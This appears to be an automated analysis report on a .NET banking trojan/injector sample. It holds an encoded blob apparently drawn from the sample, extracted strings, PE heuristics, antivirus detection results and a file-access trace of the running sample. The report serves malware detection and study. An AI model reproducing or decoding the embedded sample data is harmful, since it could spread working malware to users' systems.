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1kYBAaGjBpEBoaMnUSHREQGho4MhO4EBoaM3UQGhoydRIMExcbGhoDlw1qGhqZaDwL5BnkDBvkDBvkDhAaGjJ1EhAaGj0yFj8MMQw8Hjc/GxoaD292xBAxGhoZMhAaGj91DhAaGjoyARoaHMoeGhodZB4aGh2aEBoaPmlgEBoaOWkQGho4MhsaGgOXDGoaGlNoOjYQGho7dRAaGjoyARoaHMoeGhodZDY2HhoaHWQaGhreIxAaGgV1ARoaHAzkGhUINgEaGhyWGAsaGh0aGhr4Gh4qARoaMDEaGhh1HhoaHGYYGGAQGhoEaWoaGhtoETYZMBspHhoaHGEYGYwwHhoaHGEYHhoaHGcxGhobMh4aGhxhGBgLGhocGhoaAhoYKgkaMBAaGgN1HhoaH2QLGhofGhoaERobKgkaMBAaGgJ1HhoaHmQLGhoeGhoaERobKgkaMBAaGg11HhoaGWQLGhoZGhoaERobKgkaMBAaGgx1HhoaGGQLGhoYGhoaERobKgkaMBAaGg91HhoaG2QLGhobGhoaERobKgkwHhoaH5oQGhoOaR4aGh6aEBoaCWkeGhoZmhAaGghpHhoaGJoQGhoLaR4aGhuaEBoaCmnUMBAaGhUyGAQaGjAQGhoXdRwaGhF1HBoaEzIYXBoaGjAQGhoRdQwYEBoaEHUNGBAaGhN1DRgQGhoSdQwYEBoaHTIMGIgbGhoaGxoWFhoaGhgaGgobGhoaMBAaGhl1GBwaGh0yxhvEEBoaGDIQGhobMhoaGhoaGhoDGhgqARoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhg6GhoyFhwaGhsaGhoZGho/EhoaMDYaHxoYGhoaUhoaGhoaGlVqGhoaGhoaGhoaGhoaGhoaGlgaGloaGhoaGhoaGhoaGhoaGiQaGhoYGhoamhoaGhoWGhp5dXZ/aDRaGhpaGhoaGhoaGhoaGhoaGhooGhoaFhoaGnoaGhoWGhoaGnloaWg0ehoaOhoaGhoaGhoaGhoaGhoaGBoaGioaGho6GhoaNY4aGhpuYn9uNBoaGhoaGhoaGhoaUhoaOhIaGhoaGhoaGhoaGhIaGjoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaFhoamhoaGhoaGhoaGhoaGhoaGhoaGhoWGhoaehoaGhpNGhpVLhoaGhoaGhoaGhoaChoaGhoaGgoaGgoaGhoaChoaChoan1oaGBoaGhoaGhgaGhq6GhoaGhoaGhoeGhoaGhoaGh4aGhgaGho6GhpaGhoaGhoaGho6GhoaVZQaGhoaGhoUGhoaKhoaEhsRGxga+hoaGhoaGhoaT5YUvxoZG1YaGl9KGhoaGhoaGj4QFxc0f351dzpJVV46dHM6dG9oOn94Om51dHR7eTp3e2h9dWhqOmlzck4711YbojvXE64aFKAFFBoaGpoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGloaGhoaGhoaohoa5eUaGhoeGhoaGRqKQFc=proxitselfproxFalseproxproxproxFalseproxproxproxFalseproxprox
A(%s15
System.Windows.Forms.Form
3System.Resources.Tools.StronglyTypedResourceBuilder
pass
System.Windows.Forms
%tEXtdate:create
%tEXtdate:modify
mscoree.dll
_WebBrowser1
add_Shutdown
set_WebBrowser1
get_WebBrowser1
BackgroundWorker1_DoWork
get_ExecutablePath
get_ResourceManager
set_ShutdownStyle
noreply@nos.pt0
noreply@nos.pt0
lSystem.Resources.ResourceReader, mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
lSystem.Resources.ResourceReader, mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
lSystem.Resources.ResourceReader, mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
lSystem.Resources.ResourceReader, mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
DebuggerHiddenAttribute
add_DocumentCompleted
BackgroundWorker1
BackgroundWorker1
WebBrowser
BackgroundWorker
AuthenticationMode
DebuggableAttribute
DebuggingModes
ShutdownMode
ResourceManager
DebuggerStepThroughAttribute
m_FormBeingCreated
OnCreateMainForm
sbproc.omeusegundo
file.resource
Hashtable
sbproc.omeuprimeiro
sbproc.omeuterceiro
Sleep
GetHashCode
Hide
$5eccdbfc-28d9-4c2b-8e7b-28e7d177a3f1
_BackgroundWorker1
set_BackgroundWorker1
get_BackgroundWorker1
WebBrowser1
WebBrowser1
WebBrowser1
WebBrowser1_DocumentCompleted
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
WebBrowserDocumentCompletedEventHandler
WebBrowserDocumentCompletedEventArgs
DebuggerNonUserCodeAttribute
HideModuleNameAttribute
ShutdownEventHandler
_RichTextBox1
get_RichTextBox1
set_RichTextBox1
_Button3
_Button2
_Button1
_CorExeMain
set_Form1
get_Form3
get_Form2
get_Form1

Foremost
Matches
0.exe, 247 KB, 331.png, 78 KB
Suspicious
True check_circle
Heuristics
IPs
hasIPs: True check_circle
Allowed
Suspicious: 15.4.27.16, 0, Unknown
hasAllowed: False cancel
hasSuspicious: True check_circle

URLs
Allowed
hasURLs: True check_circle
Suspicious: http://www.google.com
hasAllowed: False cancel
hasSuspicious: True check_circle

Files
Allowed: mscoree.dll
hasFiles: True check_circle
Suspicious
hasAllowed: True check_circle
hasSuspicious: False cancel

Binary
Sizes
RVA
RVA: 16
Suspicious: False cancel
Code
Size: 151552
Suspicious: False cancel
Image
Address: 4194304
Suspicious: False cancel
Stack
Stack: 4096
Suspicious: False cancel
Headers
Headers: 512
Suspicious: False cancel
Suspicious: False cancel

Symbols
Number
Number: 0
Suspicious: True check_circle
Pointer
Pointer: 0
Suspicious: True check_circle
Directories
Number: 16
Suspicious: False cancel

Checksum
Value: 318402
Suspicous: False cancel

Sections
Allowed: .text, .rsrc, .reloc
Suspicious
hasAllowed: True check_circle
hasSections: True check_circle
hasSuspicious: False cancel

Versions
OS
Version: 4
Suspicious: False cancel
Image
Version: True check_circle
Suspicious: 4
Linker
Version: 11.0
Suspicious: False cancel
Subsystem
Version: 4.0
Suspicious: False cancel
Suspicious: False cancel

EntryPoint
Address: 108766
Suspicious: False cancel

Anomalies
Anomalies
hasAnomalies: False cancel

Libraries
Allowed: mscoree.dll
hasLibs: True check_circle
Suspicious
hasAllowed: True check_circle
hasSuspicious: False cancel

Timestamp
Past: False cancel
Valid: True check_circle
Value: 2015-06-20 23:29:37
Future: False cancel

Compilation
Packed: False cancel
Missing: False cancel
Packers
Compiled: True check_circle
Compilers: Microsoft Visual C# / Basic .NET, Microsoft Visual Studio .NET, .NET executable, Microsoft Visual C# v7.0 / Basic .NET

Obfuscation
XOR: False cancel
Fuzzing: True check_circle

PEDetector
Matches
None
Suspicious
False cancel
Disassembly
hasTricks
True check_circle
Tricks
pushret
.rsrc: 44
.text: 1

pushpopmath
.rsrc: 31
.text: 70

garbagebytes
.rsrc: 15

hookdetection
.rsrc: 2

software breakpoint
.rsrc: 1

fakeconditionaljumps
.rsrc: 4

programcontrolflowchange
.rsrc: 11

cpuinstructionsresultscomparison
.rsrc: 1
.text: 6

AVclass
msilperseus
1
VirusTotal
md5
50c8d4a1457b26990b63796108afe7eb
sha1
fd2c81a2ff5e1da6421fb45b639381f84b7db0e6
SCANS (DETECTION RATE = 73.85%)
AVG
result: MSIL:Banker-BE [Trj]
update: 20180323
version: 18.2.3827.0
detected: True check_circle

MAX
result: malware (ai score=82)
update: 20180324
version: 2017.11.15.1
detected: True check_circle

Bkav
update: 20180322
version: 1.3.0.9466
detected: False cancel

K7GW
result: Trojan ( 004c690f1 )
update: 20180323
version: 10.42.26598
detected: True check_circle

ALYac
result: Gen:Variant.MSILPerseus.4500
update: 20180323
version: 1.1.1.5
detected: True check_circle

Avast
result: MSIL:Banker-BE [Trj]
update: 20180323
version: 18.2.3827.0
detected: True check_circle

Avira
result: TR/Injector.254512
update: 20180323
version: 8.3.3.6
detected: True check_circle

Baidu
result: Win32.Trojan.WisdomEyes.16070401.9500.9997
update: 20180323
version: 1.0.0.2
detected: True check_circle

Cyren
update: 20180323
version: 5.4.30.7
detected: False cancel

DrWeb
result: Trojan.PWS.Multi.1730
update: 20180323
version: 7.0.28.2020
detected: True check_circle

GData
result: Gen:Variant.MSILPerseus.4500
update: 20180323
version: A:25.16481B:25.11861
detected: True check_circle

Panda
result: Trj/CI.A
update: 20180323
version: 4.6.4.2
detected: True check_circle

VBA32
result: TrojanDropper.Injector
update: 20180323
version: 3.12.28.0
detected: True check_circle

VIPRE
result: Trojan.Win32.Generic!BT
update: 20180323
version: 65478
detected: True check_circle

Zoner
update: 20180323
version: 1.0
detected: False cancel

AVware
result: Trojan.Win32.Generic!BT
update: 20180323
version: 1.5.0.42
detected: True check_circle

ClamAV
update: 20180323
version: 0.99.2.0
detected: False cancel

Comodo
update: 20180323
detected: False cancel

F-Prot
update: 20180323
version: 4.7.1.166
detected: False cancel

Ikarus
result: Trojan.MSIL.Injector
update: 20180323
version: 0.1.5.2
detected: True check_circle

McAfee
result: RDN/Generic.dx!d2k
update: 20180323
version: 6.0.6.653
detected: True check_circle

Rising
result: Malware.Undefined!8.C (TFE:C:CdK17hiCWs)
update: 20180323
version: 25.0.0.1
detected: True check_circle

Sophos
result: Mal/Generic-S
update: 20180323
version: 4.98.0
detected: True check_circle

Yandex
result: Trojan.DR.Injector!YFz/iLhG2mQ
update: 20180323
version: 5.5.1.3
detected: True check_circle

Zillya
result: Dropper.Injector.Win32.68188
update: 20180323
version: 2.0.0.3519
detected: True check_circle

Arcabit
result: Trojan.MSILPerseus.D1194
update: 20180323
version: 1.0.0.831
detected: True check_circle

Cylance
result: Unsafe
update: 20180324
version: 2.3.1.101
detected: True check_circle

Endgame
result: malicious (high confidence)
update: 20180316
version: 2.0.5
detected: True check_circle

Tencent
result: Win32.Trojan-dropper.Injector.Svho
update: 20180324
version: 1.0.0.1
detected: True check_circle

ViRobot
update: 20180323
version: 2014.3.20.0
detected: False cancel

eGambit
update: 20180324
version: v4.3.5
detected: False cancel

Ad-Aware
result: Gen:Variant.MSILPerseus.4500
update: 20180323
version: 3.0.3.1010
detected: True check_circle

AegisLab
result: Troj.Dropper.W32.Injector.mmgn!c
update: 20180323
version: 4.2
detected: True check_circle

Emsisoft
result: Gen:Variant.MSILPerseus.4500 (B)
update: 20180323
version: 4.0.2.899
detected: True check_circle

F-Secure
result: Gen:Variant.MSILPerseus.4500
update: 20180323
version: 11.0.19100.45
detected: True check_circle

Fortinet
result: MSIL/Injector.KHB!tr
update: 20180323
version: 5.4.247.0
detected: True check_circle

Invincea
result: heuristic
update: 20180121
version: 6.3.4.26036
detected: True check_circle

Jiangmin
result: TrojanDropper.Injector.aykz
update: 20180323
version: 16.0.100
detected: True check_circle

Kingsoft
update: 20180324
version: 2013.8.14.323
detected: False cancel

Paloalto
result: generic.ml
update: 20180324
version: 1.0
detected: True check_circle

Symantec
result: Trojan.Gen
update: 20180323
version: 1.5.0.0
detected: True check_circle

nProtect
update: 20180323
version: 2018-03-23.02
detected: False cancel

AhnLab-V3
result: Malware/Win32.Generic.R156465
update: 20180323
version: 3.12.0.20130
detected: True check_circle

Kaspersky
result: Trojan-Dropper.Win32.Injector.mmgn
update: 20180323
version: 15.0.1.13
detected: True check_circle

Microsoft
result: VirTool:MSIL/Obfuscator.BW
update: 20180323
version: 1.1.14600.4
detected: True check_circle

Qihoo-360
result: Win32/Trojan.bd4
update: 20180324
version: 1.0.0.1120
detected: True check_circle

TheHacker
update: 20180319
version: 6.8.0.5.2551
detected: False cancel

ZoneAlarm
result: Trojan-Dropper.Win32.Injector.mmgn
update: 20180323
version: 1.0
detected: True check_circle

Cybereason
result: malicious.1457b2
update: 20180225
version: 1.2.27
detected: True check_circle

ESET-NOD32
result: a variant of MSIL/Injector.KHB
update: 20180323
version: 17107
detected: True check_circle

TrendMicro
result: TROJ_GEN.R002C0DBF18
update: 20180323
version: 9.862.0.1074
detected: True check_circle

WhiteArmor
update: 20180223
detected: False cancel

BitDefender
result: Gen:Variant.MSILPerseus.4500
update: 20180323
version: 7.2
detected: True check_circle

CrowdStrike
result: malicious_confidence_100% (W)
update: 20170201
version: 1.0
detected: True check_circle

K7AntiVirus
result: Trojan ( 004c690f1 )
update: 20180323
version: 10.42.26598
detected: True check_circle

SentinelOne
update: 20180225
version: 1.0.15.206
detected: False cancel

Avast-Mobile
update: 20180323
version: 180323-04
detected: False cancel

Malwarebytes
update: 20180323
version: 2.1.1.1115
detected: False cancel

TotalDefense
update: 20180323
version: 37.1.62.1
detected: False cancel

CAT-QuickHeal
result: TrojanDropper.Injector
update: 20180323
version: 14.00
detected: True check_circle

NANO-Antivirus
result: Trojan.Win32.Androm.dztpoa
update: 20180323
version: 1.0.100.22043
detected: True check_circle

MicroWorld-eScan
result: Gen:Variant.MSILPerseus.4500
update: 20180323
version: 14.0.297.0
detected: True check_circle

SUPERAntiSpyware
update: 20180323
version: 5.6.0.1032
detected: False cancel

McAfee-GW-Edition
result: RDN/Generic.dx!d2k
update: 20180323
version: v2015
detected: True check_circle

TrendMicro-HouseCall
result: TROJ_GEN.R002C0DBF18
update: 20180323
version: 9.950.0.1006
detected: True check_circle

total
65
sha256
0a11ceaa5a2bd3670357a261460dde1158e8d8c46faf3d94e941099bfab7ffc4
scan_id
0a11ceaa5a2bd3670357a261460dde1158e8d8c46faf3d94e941099bfab7ffc4-1521846275
resource
50c8d4a1457b26990b63796108afe7eb
positives
48
scan_date
2018-03-23 23:04:35
verbose_msg
Scan finished, information embedded
response_code
1
File
Trace
29/2/2020 - 1:45:45.856Open1480C:\malware.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config
29/2/2020 - 1:45:45.903Read1480C:\malware.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.configmachine.config
29/2/2020 - 1:45:45.903Read1480C:\malware.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.configmachine.config
29/2/2020 - 1:45:45.903Read1480C:\malware.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.configmachine.config
29/2/2020 - 1:45:45.903Read1480C:\malware.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.configmachine.config
29/2/2020 - 1:45:45.903Read1480C:\malware.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.configmachine.config
29/2/2020 - 1:45:45.903Read1480C:\malware.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.configmachine.config
29/2/2020 - 1:45:45.903Open1480C:\malware.exeC:\malware.exe.config
29/2/2020 - 1:45:45.903Open1480C:\malware.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\fusion.localgac
29/2/2020 - 1:45:45.903Open1480C:\malware.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config
29/2/2020 - 1:45:45.903Open1480C:\malware.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch
29/2/2020 - 1:45:45.903Open1480C:\malware.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config
29/2/2020 - 1:45:45.903Open1480C:\malware.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch
29/2/2020 - 1:45:45.918Open1480C:\malware.exeC:\Windows\Globalization\Sorting\SortDefault.nls
29/2/2020 - 1:45:45.918Unknown1480C:\malware.exeC:\Windows\Globalization\Sorting\SortDefault.nlsSortDefault.nls
29/2/2020 - 1:45:45.918Open1480C:\malware.exeC:\Users\Behemot
29/2/2020 - 1:45:45.918Open1480C:\malware.exeC:\Users\Behemot
29/2/2020 - 1:45:45.918Unknown1480C:\malware.exeC:\Users\Behemot
29/2/2020 - 1:45:45.918Open1480C:\malware.exeC:\Users\Behemot\AppData\Roaming
29/2/2020 - 1:45:45.918Open1480C:\malware.exeC:\Users\Behemot\AppData\Roaming
29/2/2020 - 1:45:45.918Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Roaming
29/2/2020 - 1:45:45.918Open1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config
29/2/2020 - 1:45:45.918Open1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch
29/2/2020 - 1:45:45.918Open1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\index164.dat
29/2/2020 - 1:45:45.918Open1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
29/2/2020 - 1:45:45.918Unknown1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:45.918Open1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
29/2/2020 - 1:45:45.918Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:45.918Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:45.918Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:45.918Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:45.918Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:45.918Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:45.918Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:45.918Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:45.918Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:45.918Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:45.918Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:45.918Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:45.918Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:45.918Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:45.918Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:45.918Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:45.918Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:45.934Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:45.934Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:45.934Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:45.934Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:45.934Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:45.934Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:45.934Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:45.934Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:45.934Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
